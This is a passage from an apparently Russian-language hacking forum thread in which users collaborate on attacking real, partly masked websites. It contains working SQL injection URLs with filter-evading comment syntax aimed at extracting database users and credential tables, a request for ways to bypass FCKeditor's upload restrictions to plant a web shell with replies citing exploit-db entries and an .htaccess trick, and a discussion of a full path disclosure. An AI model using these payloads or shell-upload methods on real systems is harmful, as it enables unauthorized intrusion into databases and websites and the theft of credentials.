Старый 13.08.2011, 14:06   #1211
avenu
 
Аватар для avenu
 
Регистрация: 10.07.2010
Сообщений: 36
Репутация: 13
По умолчанию

2 snake
мб с выводом попроще буит ?
Код:
http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
к mysql.user доступа нет вроде
Код:
http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*!from*/+/*!mysql.user*/--+
а на mb_users и вовсе кажеццо фильтр стоит =\
Код:
http://www.***.com/podcast.xml?id=3160+limit+0+union/**/select+1,2,3,4,5,/*!user()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+/*!from*/+/*!mb_users*/--+
__________________
С утра и навсегда

Последний раз редактировалось Twost; 17.05.2013 в 13:05..
avenu вне форума   Ответить с цитированием
Старый 13.08.2011, 18:10   #1212
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

и на user_password?Но как то ж я набрутил таблицы,значит доступ есть и фильтра нет.Вобщем ладно.Спасибо за помощь.
snake вне форума   Ответить с цитированием
Старый 14.08.2011, 07:27   #1213
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Кто нибудь в курсе, FCKeditor можно ли как нибудь обмануть и залить шелл через него?
Если на сайте доступен: FCKeditor/editor/filemanager/connectors/php/upload.php
Можно было бы что нибудь придумать, если бы не блокировка всех неизвестных приложению расширений.... пока на этот счёт мыслей никаких... с нулл байтом тож...
Nightmare вне форума   Ответить с цитированием
Старый 14.08.2011, 07:46   #1214
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

http://www.exploit-db.com/exploits/17644/
сам не проверял, просто видел мельком
col вне форума   Ответить с цитированием
Старый 14.08.2011, 12:27   #1215
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
если бы не блокировка всех неизвестных приложению расширений
Цитата:
http://www.exploit-db.com/exploits/17644/
сам не проверял, просто видел мельком
.htaccess конечно крутой способ для all versian, но вряд ли имеется в списке разрешенных расширений
Pashkela вне форума   Ответить с цитированием
Старый 14.08.2011, 12:36   #1216
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

в fckeditor до 2.4.3 есть возможность залить любой файл с любым расширением, http://www.exploit-db.com/exploits/15484/ , там для Media не указаны расширения.
версию глянуть можно в fckeditor.js

upd. не покатит, путь говорит о версии >=2.5

Последний раз редактировалось Andrey1800; 14.08.2011 в 15:03..
Andrey1800 вне форума   Ответить с цитированием
Старый 14.08.2011, 14:08   #1217
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

ето что за ошибка ?
sqli?
Цитата:
http://www.***.am/en/?nid=324'a

Последний раз редактировалось Twost; 17.05.2013 в 13:06..
salut вне форума   Ответить с цитированием
Старый 14.08.2011, 14:20   #1218
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Full Path Disclosure это
Pashkela вне форума   Ответить с цитированием
Старый 14.08.2011, 14:27   #1219
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

немного подробнее можно?
просто знаем path ,или что можно зделать с етим ?
salut вне форума   Ответить с цитированием
Старый 14.08.2011, 14:50   #1220
[wh]
 
Регистрация: 13.08.2011
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
просто знаем path ,
Да.
Цитата:
немного подробнее можно?
Почитай это.
[wh] вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot